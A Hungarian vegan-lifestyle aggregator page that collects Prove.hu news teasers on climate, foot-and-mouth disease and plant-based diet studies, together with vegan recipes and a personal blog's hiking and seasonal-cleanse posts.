
Még kapható a második,
bővített kiadás!

Próbálja ki, biztosan ízleni fog!
Allergiások és vegánok, figyelem: a Lidl burgonyás pogácsája mostantól tejfölt tartalmaz
édes receptek
Négymillió dollárt vonnak el a Princetoni Egyetem klímakutató intézetétől
tegnap 04:45 Prove - a világ vegán szemmel
Túlzónak, valószínűtlennek és szorongást keltőnek minősítette a Trump-kormány a Princetoni Egyetemen végzett, klímaváltozással kapcsolatos tudományos programokat. Az egyetem és a Nemzeti Óceán- és Légkörkutató Hivatal közös intézetétől ezért most összesen négymillió dollárt vonnak el. A szakértők és klímakutatók borzalmas lépésnek tartják az állami támogatás megvágását. Egészen biztos, hogy Donald Trump kormányzása nem a környezetvédelmi intézkedések… The post Négymillió dollárt vonnak el a Princetoni Egyetem klímakutató intézetétől appeared first on Prove.hu.
A történelem legsúlyosabb korallfehéredésével küzdenek a világ zátonyai
2025. április 26. Prove - a világ vegán szemmel
Jelenleg a negyedik korallfehéredési esemény zajlik globálisan - erősítette meg az amerikai Nemzeti Óceán- és Légkörkutató Hivatal, a NOAA. A 2023 januárjától számolt időszak alatt a hőstressz a világ korallzátonyainak több mint 80 százalékán okozott fehéredést. Az elmúlt szűk két és fél évben a korallzátonyok 83,7 százalékát érte fehéredést okozó mértékű hőstressz. Ezt a 2023… The post A történelem legsúlyosabb korallfehéredésével küzdenek a világ zátonyai appeared first on Prove.hu.
Gluténmentes karobos muffin
2025. április 25. Élj harmóniában
A tavaszi táplálkozás fő elve, a testedben lévő nedvesség (vizesedés, kézdagadás, ödéma, nyálkásodás, megfázás, allergiák) ellensúlyozása. Ez a muffin egy idei kísérletem, már sokadszor készítem el, és nálam megúnhatatlan lett. Szeretem ha valami nem túl édes és amúgy is a tavaszi étrendben érdemes a nyálkásító ételeket csökkenteni (pl. zsíros ételek, édességek, tejtermékek, pékáruk). A recepthez, úgy válogattam össze az alapanyagokat és a fűszereket, hogy ne nyálkásítsa a szervezetet, inkább kicsit szárító hatású legyen. Ráadásul ez a recept szuper jól beilleszthető a tavaszi tisztítókúra előkészítő és visszatérési szakaszába. Hozzávalók: 1 csésze rizsliszt 1 csésze hajdinaliszt 1/3 csésze kókuszliszt 3/4 csésze teljes értékű nádcukor 3/4 zacskó sütőpor 3 púpos ek. karobport (ha nincs otthon kakaót is használhatsz) 1/2 csésze tökmag 1/2 csésze aszalt vörösáfonya (ha nincs otthon tehetsz bele mazsolát) 6 ek kókuszzsír fahéj kardamom 1,5 - 2,5 csésze víz díszítéshez, ha szereted karobpor Egy tálban keverd össze a liszteket, a sütőport, a fűszereket ízlés szerint és a cukrot. Ha édesebben szereted, akkor több cukrot tegyél. Majd keverd hozzá az olvasztott kókuszzsírt és a vizet adagolva, addig amíg krémes muffintésztát nem kapsz - ne legyen folyós. Add hozzá a tökmagot és az áfonyát és keverd össze. Egy muffin formába (tehetsz bele muffin papírt) adagold bele a tésztát. Én mindegyiknek tettem a közepébe 1 - 2 aszalt szilvát. Tedd 180°C fokra előmelegített sütőbe és süsd amíg aranybarnára sül. (kb. 20-25p) Ha szeretnéd karobporral szórd meg a tetejét - bevallom én mindig szűrőn keresztül szórok:) Vegyszermentes (bio) alapanyagokat használj! Ha szeretnél egy irányított és támogató, gyengéd megoldást a szervezeted tisztítására, a salakanyagok eltávolítására, ahol napról, napra kísérlek végig a méregtelenítésen és bármikor kérdezhetsz is tőlem, akkor csatlakozz a Szezonális Tisztítás Online Programhoz. részletek és jelentkzés: https://www.eljharmoniaban.hu/tisztitas Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat kívánok:) szeretettel KAti #tisztítókúra #tavasz #recept #gluténmentes #édesség #muffin #vegán #vegetáriánus #tojásmentes #éljharmóniában #tisztítóétrend
Rohamot színlelve raboltak el kölyökkutyákat egy állatkereskedésből
2025. április 22. Prove - a világ vegán szemmel
Különös módszerrel rabolt el két elkövető kölyökkutyákat egy denveri állatkereskedésből. Az eseményeket az üzlet biztonsági kamerája rögzítette is. A két elrabolt buldog közül az egyik még mindig nem került elő. A Denver államban található Perfect Pets nevű állatkereskedés biztonsági kamerája rögzítette azt a rablási kísérletet, amelyről februárban számolt be az ABC News. A felvételen az… The post Rohamot színlelve raboltak el kölyökkutyákat egy állatkereskedésből appeared first on Prove.hu.
Könnyed délutáni túra
2025. április 19. Élj harmóniában
Baráti találka, mi más, mint közös túra - húsvét, szombat délután, elkerülve a kiránduló tömegeket:) A mesés tavaszi erdők tele vannak szebbnél, szebb virágokkal, mézédes illatokkal és a táj egyre zöldebb. Az ég gyönyörű kék, varázslatos felhőkkel. Ez egy könnyed délutáni túra, komolyabb szintemelkedés nélkül. Mai útvonal: Piliscsév - Basa-hegy - Piliscsév szeretettel Kati #túra #kirándulás #piliscsév #éljharmóniában
Száj- és körömfájás: lakosok és önkormányzatok is tiltakoznak az állatok elföldelése miatt
2025. április 10. Prove - a világ vegán szemmel
Továbbra is küzdenek a hatóságok és az állattartó telepek a ragadós száj- és körömfájás terjedése ellen. Az állatok elföldelése a lakott területek közelében az érintett civilek és önkormányzatok tiltakozását váltotta ki. Mindeközben Nagy István agrárminiszter a korábban elföldelt állatok körül a vízminőség ellenőrzését rendelte el. A március elején megjelent, párosujjú patásokat érintő ragadós száj- és… The post Száj- és körömfájás: lakosok és önkormányzatok is tiltakoznak az állatok elföldelése miatt appeared first on Prove.hu.
Az egészséges öregedés kulcselemére mutattak rá kutatók
2025. április 7. Prove - a világ vegán szemmel
A növényi alapú táplálkozás kulcsszerepet játszhat az egészséges öregkor elérésében egy új tanulmány szerint. A kutatók arra jutottak, a fitt, krónikus betegségektől mentes nyugdíjas évekre garanciát ugyan nem biztosíthat a feldolgozott és az állati eredetű ételek minimalizálása az étrendben, az esélyeket azonban jócskán javíthatja. Egy egészséges, azaz elsősorban növényi alapú, minimális ultrafeldolgozott élelmiszert és csak… The post Az egészséges öregedés kulcselemére mutattak rá kutatók appeared first on Prove.hu.
Ausztria is lezár határátkelőket a száj- és körömfájás miatt
2025. április 4. Prove - a világ vegán szemmel
Szlovákia után Ausztria is lezár határátkelőket, hogy megakadályozza a ragadós száj- és körömfájás terjedését. Közben itthon is újabb szigorítások léptek érvénybe a vírus megfékezésének érdekében. Ausztria szombattól határátkelőket zár le a párosujjú patásokat érintő, március eleje óta tartó ragadós száj- és körömfájás miatt. A lezárt magyar és szlovák átkelőket az osztrák belügyminisztérium az érintett alsó-ausztriai… The post Ausztria is lezár határátkelőket a száj- és körömfájás miatt appeared first on Prove.hu.
Már a honvédséget is bevetik a járvány fékezésében - újabb telepek estek el
2025. április 2. Prove - a világ vegán szemmel
A száj- és körömfájás vírus jelenlétét két újabb magyar szarvasmarhatelepen igazolták. Nagy István agrárminiszter további korlátozó intézkedéseket jelentett be. A Nébih pedig leszögezte, a Magyarországon forgalomba kerülő, állati eredetű élelmiszerek teljesen biztonságosak, és azok is maradnak a szigorú járványvédelmi fellépésnek köszönhetően. Újabb Győr-Moson-Sopron vármegyei szarvasmarhatelepeken igazolta a ragadós száj- és körömfájás vírus jelenlétét a Nemzeti… The post Már a honvédséget is bevetik a járvány fékezésében - újabb telepek estek el appeared first on Prove.hu.
Kérdés, okoz-e áremelkedést a továbbterjedő száj- és körömfájás
2025. március 31. Prove - a világ vegán szemmel
Újabb szlovákiai szarvasmarha-telepen azonosították a ragadós száj- és körömfájást, ezúttal az ország egyik legnagyobb tejgazdasága érintett. A szlovák agrárminiszter szerint azonban sem élelmiszerhiány, sem árnövekedés kialakulásától nem kell tartani. Az eddigi legnagyobb szarvasmarha-telepen találtak pénteken száj- és körömfájással fertőzött egyedeket. A gazdaság Erdőhát területén, Nyugat-Szlovákiában található, vagyis a fertőzés az igyekezetek ellenére most már az… The post Kérdés, okoz-e áremelkedést a továbbterjedő száj- és körömfájás appeared first on Prove.hu.
Rosszabbul hathat az egészségre a vaj, mint a növényi olajok fogyasztása
2025. március 25. Prove - a világ vegán szemmel
Évtizedes vita övezi a kérdést, hogy az állati eredetű vaj vagy a növényi olajok egészségesebbek. Egy új tanulmány most arra jutott, hogy a legtöbb vajat fogyasztók körében magasabb volt a halálozási arány. A növényi olajok jobban szerepeltek, ezek közül a szója-, repce- és olívaolaj bizonyultak a legjobbnak. A kutatás több mint kétszázezer alany három évtizedet… The post Rosszabbul hathat az egészségre a vaj, mint a növényi olajok fogyasztása appeared first on Prove.hu.
Thai ihletésű quinoasaláta pikáns mogyoróvajas öntettel
2025. március 6. Prove - a világ vegán szemmel
A thai konyha jellegzetes aromái köszönnek vissza ebben a színes, tápanyagokban gazdag quinoasalátában: az édes, sós, savanyú és csípős ízek harmóniája. A füstölt tofu karakteres íze, a ropogós zöldségek és a mogyoróvajas öntet teszi ezt az ételt könnyű, mégis laktató fogássá. Tökéletes ebédre vagy vacsorára, sőt, előre elkészítve is kiváló, így magaddal viheted munkába vagy… The post Thai ihletésű quinoasaláta pikáns mogyoróvajas öntettel appeared first on Prove.hu.
Asztalt borított egy csapat a hiányos mentesdesszert-választék láttán
2025. március 1. Prove - a világ vegán szemmel
A Naked Noble márka megálmodói belefáradtak, hogy kevés olyan mentes édesség van a magyar piacon, ami ne lenne kompromisszumos. Elhatároztak, hogy fellépnek ezzel szemben. Olyan mentes desszertkrémet szerettek volna Magyarországon piacra dobni, amely egyszerre egészséges, finom és fenntartható. Végül három verzióval is előrukkoltak 2024-ben, idén pedig triplázzák kínálatukat. Megvan az az érzés, amikor egy fájdalmas… The post Asztalt borított egy csapat a hiányos mentesdesszert-választék láttán appeared first on Prove.hu.
Egyre nagyobb patkánykolóniákkal számolhatunk a városokban
2025. február 25. Prove - a világ vegán szemmel
Megugrott a patkányok száma a nagyvárosokban, kutatók pedig arra jutottak, hogy az elszaporodásuk az átlaghőmérséklet emelkedéséhez köthető. Megállapították, hogy a kutatásaik során vizsgált városok esetében a felmelegedés mértékével korrelált a patkányok számának növekedése. Ugrásszerűen növekedhet a patkányok száma a városokban a globális felmelegedéssel párhuzamosan - derült ki egy friss tanulmányból. A kutatók 16 város adatait elemezték… The post Egyre nagyobb patkánykolóniákkal számolhatunk a városokban appeared first on Prove.hu.
A legelső lehetőségnél visszakacsintott a műanyagra a Coca-Cola
2025. február 22. Prove - a világ vegán szemmel
A műanyag palack a megoldás a Coca-Cola vezérigazgatója, James Quincey szerint az újonnan kivetett vámok okozta költségnövekedés kikerülésére. Az Egyesült Államokban így az alumíniumdobozok helyett a PET-palackos csomagolást részesíthetik előnyben. Az ezekből poharakba kiöntött italba pedig papír helyett műanyag szívószál kerülhet majd Donald Trump amerikai elnök egyik rendelete nyomán. Kénytelen lehet több műanyag palackos italt… The post A legelső lehetőségnél visszakacsintott a műanyagra a Coca-Cola appeared first on Prove.hu.
Pánikoló macskatartókat kellett nyugtatnia a skót kormányfőnek
2025. február 19. Prove - a világ vegán szemmel
Nem lesz macskatilalom, szögezte le John Swinney, Skócia első minisztere. Egy miniszteri tanácsadói bizottság azonban szigorításokat szorgalmaz. A jelentésük alapján muszáj lenne fellépni a házi macskák és a vadmacskák keveredése, valamint a házikedvencek vadvilágot tizedelő ösztöneivel szemben. ,,Egyáltalán nem áll szándékunkban macskatilalom bevezetése. Szó sincs arról, hogy ez megtörténjen - nyilatkozta John Swinney, Skócia első… The post Pánikoló macskatartókat kellett nyugtatnia a skót kormányfőnek appeared first on Prove.hu.
Céklás brownie (vegán, gluténmentes), epres krémmel
Egy könnyű, gyors, egészséges és finom édesség receptjét hoztam el nektek. Hozzávalók: 40 dkg cékla (héjával együtt mérve) 10 dkg zabliszt 5 dkg mandulaliszt vagy gesztenyeliszt 5 dkg tápiókakeményítő 1 csapott ek. sütőpor 1/4 evőkanál szódabikarbóna 8 dkg friss datolya 3 ek. almaecet 2 evőkanál cukrozatlan kakaópor 1%2 tk. vaníliaőrlemény 10 dkg étcsokoládé 3 dkg […]
Nem emberek - ezért nem kerülhettek állatkerti elefántok menhelyre
2025. február 13. Prove - a világ vegán szemmel
Állatkerti elefántok menhelyi elhelyezését próbálta jogi úton kiharcolni egy állatjogi szervezet. Az állatkert szerint ezzel a cél pusztán a szenzációhajhászással kieszközölt adománygyűjtés volt. A coloradói legfelsőbb bíróság pedig egy evidenciát hozott fel ellenérvként, így utasította vissza az állatvédők kérését. Akármilyen ,,fenséges lény is az az öt elefánt, aki egy coloradói állatkertben, a Cheyenne Mountain Zooban… The post Nem emberek - ezért nem kerülhettek állatkerti elefántok menhelyre appeared first on Prove.hu.
Vegán kimchi
A kimchi Dél-Korea egyik legismertebb és legkedveltebb étele. Ez a fermentált finomság káposztából, retekkel, fűszerekkel és erjesztési folyamat során kialakuló komplex ízekből áll. Az ázsiai konyha elengedhetetlen része, egy igazi szuperétel - tele van probiotikumokkal, vitaminokkal és ásványi anyagokkal, amelyek támogatják az emésztést és az immunrendszert. Hozzávalók: A zöldségekhez: - 1 nagyobb kínai kel - 2 csapott ek csésze durva só (jódozatlan) - 1 jégcsapretek - 1 sárgarépa A fűszerpasztához: - 4 dl víz - 2 ek rizsliszt - 1 tk nádcukor - 1 ek reszelt friss gyömbér - fél kápia paprika felkockázva - 2 tk koreai chilipehely vagy por (gochugaru) - 1 tk pirospaprika - 2 ek szójaszósz - 1 tk só (jódozatlan) A kínai kelt hosszában felnégyeljük, majd a negyedeket nagyobb kockára vágjuk. Megszórjuk a sóval, jól átforgatjuk és 2 órán át állni hagyjuk. Közben előkészítjük a répát és a retket is: megpucoljuk és gyufaszál méretűre vágjuk. Megcsináljuk a fűszerpasztát. Egy kislábosban összekeverjük a rizslisztet és a vizet és folyamatosan kevergetve sűrűre főzzük. Ha megvan, belekeverjük a nádcukrot és hűlni hagyjuk. Amikor kihűlt, hozzáadjuk a kápiát, a gyömbért, a chilit, a pirospaprikát, a szójaszószt és a sót. Késes aprítóba tesszük és összeturmixoljuk. Ha letelt a 2 óra, a káposztához keverjük a zöldséget, ráöntjük a fűszerpasztát és alaposan átforgatjuk. Ha megvan, tiszta üvegbe nyomkodjuk, lezárjuk az üveget és konyhapulton 2-3 napig állni hagyjuk. Amikor látni, hogy beindul az erjedés (apró buborékok keletkeznek), hűtőbe tesszük, ahol akár hónapokig eláll. Kiegészítés: én nem főzök hagymával, azért kihagytam, de az eredeti receptekben vágnak 3-4 szál újhagymát a zöldségek közé, és turmixolnak 2-3 gerezd fokhagymát a fűszerpasztába.
Csúcson a húsfogyasztás, de egyszerre csökken is - ez a magyarázat
2025. február 8. Prove - a világ vegán szemmel
Egyes országokban nő a húsmentes életmódot választók száma, máshol azonban nő a húsfogyasztás. Ebben a cikkben megnézzük, hogy melyik globális trend az erősebb, és hogyan fér meg egymás mellett egyrészt a globális hústermelés növekedése, másrészt az egyre nagyobb teret hódító húsmentes életmód. Sokszor hallani, hogy a nagyszüleink hetente egyszer, maximum kétszer ettek húst. Ehhez képest… The post Csúcson a húsfogyasztás, de egyszerre csökken is - ez a magyarázat appeared first on Prove.hu.
Vegán palacsinta alaprecept édes és sós töltelékhez is
2025. február 2. Prove - a világ vegán szemmel
Tej- és tojásmentesen is készülhet mennyei palacsinta, amelyet kedved szerint édesen vagy akár sósan is megtölthetsz. Ahogy a hagyományos változatnál, a vegán palacsintánál is az egyik kulcs a szénsavas víz: ettől sokkal könnyedebb, levegősebb lesz a tészta állaga. Ezenfelül növényi tej kerül bele, amitől puhább lesz a palacsinta. Ezt nyugodtan kiválthatod vízzel, úgy is tökéletesen… The post Vegán palacsinta alaprecept édes és sós töltelékhez is appeared first on Prove.hu.
A hosszú élet és egészséges öregedés titka: így élnek a kék zónákban
2025. január 26. Prove - a világ vegán szemmel
Egyre több szó esik mindenhol az egészséges öregedésről és a térségenként eltérő átlagéletkor okairól. Ennek kapcsán rendre felmerülnek az úgynevezett kék zónák is: az a néhány régió, ahol a fent említett két tényező mutatói kiemelkednek a világ többi részéhez képest. Növekvő népszerűségnek örvend az egészség és a hosszú élet. Ennek köszönhetően egyre inkább bekerülnek a… The post A hosszú élet és egészséges öregedés titka: így élnek a kék zónákban appeared first on Prove.hu.
Smoothie tál bogyós gyümölcsökkel: igazi vitaminbomba reggeli
2025. január 23. Prove - a világ vegán szemmel
A smoothie tál a gyümölcsturmix sűrűbb, kanalazható formája, amit a zabkásához hasonlóan mindenféle földi jóval a tetején lehet tálalni. Ezt a változatot banánnal édesítjük, így hozzáadott cukortól mentes. Még egészségesebbé tesszük antioxidánsokban gazdag bogyós gyümölcsökkel és omega-3 zsírsavakban gazdag lenmagpehellyel. Ha inspiráció híján vagy reggeli terén, akkor jó helyen jársz. Főleg akkor, ha sokakhoz hasonlóan… The post Smoothie tál bogyós gyümölcsökkel: igazi vitaminbomba reggeli appeared first on Prove.hu.
Világjáró gasztrokalandozások a Lakshmy új Food Pack csomagjaival (x)
2025. január 23. Prove - a világ vegán szemmel
Fűszerek tekintetében talán már sok vásárló számára régi ismerősök lehetnek a Lakshmy fűszerkereskedés színes, aromás csomagjai. Az utóbbi két év folyamán a választék bővítése mellett egy új, saját fejlesztésű termékcsaláddal is tovább színesítették cégük kínálatát. Fűszereinkre tekinthetünk úgy, mint festőművész a palettáján sorakozó színekre, melyekkel kreativitásának segítségével remekműveket alkothat. Étkezésünk és ételeink minősége alapvetően hat… The post Világjáró gasztrokalandozások a Lakshmy új Food Pack csomagjaival (x) appeared first on Prove.hu.
A tetovált lány és az Agymenők sztárja is az állatok miatt lett vegán
2025. január 19. Prove - a világ vegán szemmel
Számos vegán híresség hangoztatja, hogy etikai okokból, az állatok védelmében tért át a vegán életmódra. Egyesek már le is vetkőztek a veganizmus népszerűsítéséért. Mások pedig színészkollégákat győztek meg arról, hogy térjenek át a kegyetlenségmentes táplálkozásra és életmódra. Összegyűjtöttünk nyolc olyan vegán sztárt, akik hírnevüket kihasználva világítanak rá az állatok szenvedéseire. Mayim Bialik - a vegán… The post A tetovált lány és az Agymenők sztárja is az állatok miatt lett vegán appeared first on Prove.hu.
Rekordmértékű volt a felmelegedés 2024-ben, egyre nagyobb a baj
2025. január 10. Prove - a világ vegán szemmel
Először lépte át a 1,5 Celsius-fokos küszöböt a felmelegedés 2024-ben az ipari forradalom előtti átlagértékhez képest. A párizsi klímaegyezményben foglaltak még nincsenek veszve, ám egyre távolabb kerülnek az aláíró felek attól, hogy eleget tudjanak tenni a vállaltaknak. Eddig soha nem tapasztalt mértékben, 1,6 Celsius-fokkal haladta meg a tavalyi éves átlaghőmérséklet az ipari forradalom előtti átlagértéket… The post Rekordmértékű volt a felmelegedés 2024-ben, egyre nagyobb a baj appeared first on Prove.hu.
Új szokások kialakítása: 5 módszer, amivel valósággá válhatnak a céljaid
2025. január 1. Prove - a világ vegán szemmel
Mindannyian próbáltunk már új szokásokat kialakítani - legyen szó egészségesebb táplálkozásról, rendszeres testmozgásról vagy akár napi tíz perc olvasásról. Mégis, a legtöbb esetben hamar alábbhagy a lelkesedés, és a szokás visszasüllyed a feledés homályába. De miért ilyen nehéz tartós szokásokat kialakítani? A válasz az agyunk működésében rejlik. A viselkedéstudomány szakértői szerint az új szokások beépítése… The post Új szokások kialakítása: 5 módszer, amivel valósággá válhatnak a céljaid appeared first on Prove.hu.
A növényi fehérje hozzájárulhat az egészséges öregedéshez
2024. december 23. Prove - a világ vegán szemmel
Közel ötvenezer alany eredményeit vizsgálta egy kutatás, amely alapján az egészséges öregedés és a növényi fehérje fogyasztásának mértéke nagyban összefügg. A Tufts Egyetem kutatói szerint azok, akik több növényi forrásból származó fehérjét fogyasztottak, idős korukban kevesebb krónikus betegséggel küzdöttek. Egészségesebb időskor, kevesebb egészségügyi probléma. Erre számíthatnak azok a nők, akik túlnyomórészben növényi forrásból viszik be… The post A növényi fehérje hozzájárulhat az egészséges öregedéshez appeared first on Prove.hu.
Beporzó szerepet vehetett fel egy veszélyeztetett afrikai ragadozó
2024. december 13. Prove - a világ vegán szemmel
Több etióp farkas is előszeretettel nyalogatja a fáklyaliliomot tudósok megfigyelései szerint. Az azonban még kérdéses, hogy - az ínyenckedésen túl - ezzel mennyire végeznek beporzó munkát is. Miközben köztudott, hogy a beporzó rovarokra többek között a klímaváltozás, a légszennyezés és a növényvédő szerek intenzív használata is veszélyt jelent, érdekes jelenségre figyeltek fel Etiópiában. A Bale-hegységben… The post Beporzó szerepet vehetett fel egy veszélyeztetett afrikai ragadozó appeared first on Prove.hu.
Gyorsan elkészíthető, gluténmentes szilvás morzsasüti
2024. december 8. Prove - a világ vegán szemmel
A morzsasüti, más néven crumble egy olyan sütemény, amely készülhet édes vagy sós változatban is. Mi most egy édes változatot hoztunk, amit szilvával vagy bármilyen idénygyümölccsel elkészíthetsz. Ráadásul a hagyományos morzsasütivel ellentétben ez a változat tisztán növényi eredetű összetevőkből készül, és gluténmentes is, mivel zablisztet használunk hozzá. A szűkösségből adódó leleményességnek köszönhetjük a világ egyik… The post Gyorsan elkészíthető, gluténmentes szilvás morzsasüti appeared first on Prove.hu.
Zabpelyhes lencsefasírt (TÉNÉ, GM)
2024. december 6. Prove - a világ vegán szemmel
Ez a lencsefasírt gombával, édesburgonyával, dióval és zabpehellyel készül, nem tartalmaz hozzáadott olajat, mégis mennyei a végeredmény. Ünnepi fogásként, a vasárnapi családi ebéd főételeként, de akár egyszerű hétköznapi ételként is megállja a helyét. Ez a zabpelyhes lencsefasírt több szempontból is tökéletes választás lehet, ha nem tudod, épp mit főzz: Szinte gyerekjáték elkészíteni, gyakorlatilag elronthatatlan. Az… The post Zabpelyhes lencsefasírt (TÉNÉ, GM) appeared first on Prove.hu.
Biztonságos túrázás
2024. november 29. Élj harmóniában
Sokszor hallani olyan eseteket, amikor valaki elkeveredik az erdőben vagy baleset éri, vagy veszélybe kerül vagy rásötétedik. Minden esetben nagyon sok erőforrást igényel, hogy segíteni tudjanak neki - hegyimentők, rendőrség, mentók, etc... Remete-barlang - megannyi baleset helyszíne, ide csak felkészülten, jó kondícióban menj:) Az esetek nagy része megelőzhető lenne tudatossággal. Néhány tippem, bevált gyakorlatom:) - Általában nem egyedül megyek túrázni. Jobb a csodás élményeket megosztani valakivel és persze ha valami gond van, jó ha valaki tud segítséget hívni. - Minden túra előtt megnézem mikor van naplemente és ahhoz igazítom a túrát. - Ahol nem ismerem a terepet és az útvonalakat, előre, alkalmazás segítségével tervezem a túrákat, ha nincs túl nagy rutinod, inkább kész túrautakat keress az interneten, ahol fel van tüntetve a a nehézségi szint, szintemelkedés, távolság és a becsült idő. Ne kezdj el ismeretlen terepeken letérni a túristautakról és kalandozni. - A csapat aktuális kondíciójának, állapotának megfelelően válasszatok útvonalat. - Betegen, gyengén, nem megfelelő állapotban ne indulj túrázni. - A becsült időre mindig számolj rá legalább 1 órát, mert megálltok enni, inni, nézelődni, fényképezni és kisebb nagyobb dolgokat intézni:) - A telefnod legyen teljesen feltöltve az indulásnál. - Ne kizárólag a telefonodra támaszkodj a tájékozódáshoz - nagyon sok esetben nincs térerő az erdőben. Nálam mindig van papírtérkép és iránytű. - Mindig legyen nálad elegendő folyadék és étel. Hidegebb napokon étel- és italtermoszt viszek magammal, így amit fogyasztok minden meleg. Plusz mindig vannak a zsákomban müzliszeletek, aszaltgyümölcsök, rágcsálni valók amik jók végszükség esetén:) - A terepnek és az időjárási viszonyoknak megfelelő cipőben túrázz, megfelelő túrazoknival. - Rétegesen öltözz és számolj azzal, hogy egy erdőben mindig hűvösebb van, főleg ha lemegy a nap. Hideg évszakban sapka, kesztyű, sál, meleg kabát elengedhetetlen. - Nyáron a ruhazatoddal és esetleg valami fényvédővel gondoskodj a napvédelemtről is. Nyáron mindig van egy jó nagy, vékony pamutkendőm, ami megvéd a nap forró sugaraitól. - A hátizsákom alaptartozéka a fejlámpa. Ha véletlenül nme sikerül elérni a célod naplementéig, a fejlámba segíti kicsit a látást, de nem foglalja le a kezed. - A zsák aljába mindig teszek kicsire összehajtható vízálló kabátot is. - N álunk pléd is van mindig, mert jó időben kellemes heverészni, hidegben meg jól jöhet bármi is legyen:) - Hasznosak még: bicska, némi egészségügyi csomag, hőtartó takaró - Ha elekverednél mielőbb hívj segítséget, ne várd meg amíg rádsötétedik. - Ha segítséget kell hívnod, figyeld meg a környezetedben lévő dolgokat, épületeket, jellegfákat, mindenféle tereptárgyakat, hogy a lehető legpontosabban tudj információt adni arról, merre keressenek. Egy részletes cikkem a blogomról az erdőjáráshoz: https://eljharmoniaban.blogspot.com/2018/08/hogyan-kezdj-neki-az-erdojarasnak-jo.html Klassz és biztonságos erdőjárást kívánok :) szeretettel KAti a bejegyzséhez az alábbi cikket is felhasználtam: https://www.turistamagazin.hu/hir/tiz-tipp-a-rendorsegtol-a-biztonsagos-turazasert #túra #túratervezés #erdőjárás #kirándulás #biztonságos
Vegán almás pite: klasszikus desszert újragondolva
2024. november 28. Prove - a világ vegán szemmel
A vegán almás pite egyszerű, mégis különleges desszert, amelyet bárki könnyen elkészíthet otthon. Ebben a receptben a klasszikus, itthon népszerűbb, vastag tésztás almás pitét kreáltuk újra növényi alapú hozzávalókkal, megőrizve a hagyományos sütemény jegyeit. Ideális választás, ha szeretnéd meglepni családodat vagy barátaidat egy édes finomsággal. Az almás pite egy klasszikus desszert, amelyre szinte minden háztartásnak… The post Vegán almás pite: klasszikus desszert újragondolva appeared first on Prove.hu.
Vegán citruskenyér
Cukormáz helyett Nanna VitalSweet természetes gyümölcs cukorsziruppal édesített narancspudinggal. ? Hozzávalók: 27 dkg tönkölyliszt (lehet finomliszt is)1 púpozott teáskanál sütőpor 20 dkg barnacukor 1 citrom leve és héja 1 dl olaj 1,7 dl víz — 3 dl növényi tej 2 dl narancslé 1 tasak vaníliás pudingpor 1 narancs héja Elkészítés: A tészta hozzávalóit kimérjük és […]
A növényi termékek továbbra is jól szerepelnek a főbb európai piacokon
2024. november 20. Prove - a világ vegán szemmel
Hat országban és kilenc kategóriában vizsgálta a növényi termékek gazdasági mutatóit a Good Food Institute. Elemzésük kitér az eladott élelmiszerek mennyiségére és az ipar bevételeire is. Habár a jelen gazdasági helyzet nem kedvez kifejezetten az élelmiszeriparnak, a GFI szerint a növényi termékek így is tudtak növekedést produkálni. Kiválóan teljesítenek Európában a növényi termékek a Good… The post A növényi termékek továbbra is jól szerepelnek a főbb európai piacokon appeared first on Prove.hu.
Interneten osztotta meg frusztrációját egy újdonsült férj, miután a családi vacsora veszekedésbe fulladt
2024. november 14. Prove - a világ vegán szemmel
Redditen osztotta meg történetét egy férfi, miszerint édesanyja vacsorára hívta őt és feleségét, akiről jól tudta, hogy vegán. Miután a pár megérkezett, megdöbbenve vették tudomásul, hogy egyik étel sem felel meg a feleségnek. A meghívást intéző édesanya egyszerűen nem készített vegán ételt. A heves szóváltást követően a házaspár nem maradt vacsorára. A férj az internetes… The post Interneten osztotta meg frusztrációját egy újdonsült férj, miután a családi vacsora veszekedésbe fulladt appeared first on Prove.hu.
Hozhat állatjólléti változásokat az amerikai elnökválasztás?
2024. november 5. Prove - a világ vegán szemmel
Az amerikai elnökválasztás két jelöltje, Donald Trump és Kamala Harris sem beszélt sokat az állatvédelemmel kapcsolatos terveiről. A múltbeli intézkedéseik azonban árulkodóak lehetnek - ahogy az alelnökjelöltek megnyilvánulásai is. Ma döntenek arról a választásra jogosult amerikai állampolgárok, hogy a republikánus volt elnök, Donald Trump vagy a demokrata jelölt és egyben az aktuális alelnök, Kamala Harris… The post Hozhat állatjólléti változásokat az amerikai elnökválasztás? appeared first on Prove.hu.
Az emberek többsége azonnali környezetvédelmi lépéseket vár a kormányoktól
2024. október 26. Prove - a világ vegán szemmel
A legtöbben úgy gondolják, hatásos, szigorú és legfőképp gyors intézkedésekre van szükség, ha élhető állapotban akarjuk hátrahagyni a bolygót a jövő generációi számára - derül ki egy új felmérésből. A kutatás 22 ország adatai alapján nyújt részletes betekintést az általános közvélekedésbe a környezetvédelmi kérdésekkel kapcsolatban. Átfogó felmérést készített az Ipsos UK piackutató a környezetvédelemmel kapcsolatos… The post Az emberek többsége azonnali környezetvédelmi lépéseket vár a kormányoktól appeared first on Prove.hu.
Sütőtökös csiga teljes kiőrlésű, cukormentes változatban
2024. október 24. Prove - a világ vegán szemmel
Sütőtökös csiga egészségesebb változatban? Igen, lehetséges: ehhez az édes, puha, élesztős tésztás süteményhez se finomlisztre, se hozzáadott cukorra nincs szükség, ráadásul tisztán növényi alapú összetevőkből készül. Ez az édesség tulajdonképpen a fahéjas csiga őszies, egészségesebb kiadású testvére - hiszen mindenki tudja, hogy szeptembertől novemberig mindenbe, amibe csak lehet, sütőtököt kell tenni. Ha pedig eddig azt… The post Sütőtökös csiga teljes kiőrlésű, cukormentes változatban appeared first on Prove.hu.
Koreai uborkasaláta csípős gochujang öntettel
2024. október 15. Prove - a világ vegán szemmel
Ha szereted kipróbálni az izgalmas, pikáns ízvilágú nemzetközi ételeket, akkor ez a koreai uborkasaláta éppen neked való. Garantáljuk, hogy ez az egyszerre sós, édes, savanykás és csípős uborkasaláta a legízletesebb és legropogósabb változat lesz, amit valaha kóstoltál. Ez az uborkasaláta hazájában tipikus ??, azaz banchan: ez nagyjából azt jelenti, ,,köret, ennél azonban sokkal több. A… The post Koreai uborkasaláta csípős gochujang öntettel appeared first on Prove.hu.
Billie Eilish és a Google Maps együtt segítenek a koncertre járóknak fenntartható döntéseket hozni
2024. október 8. Prove - a világ vegán szemmel
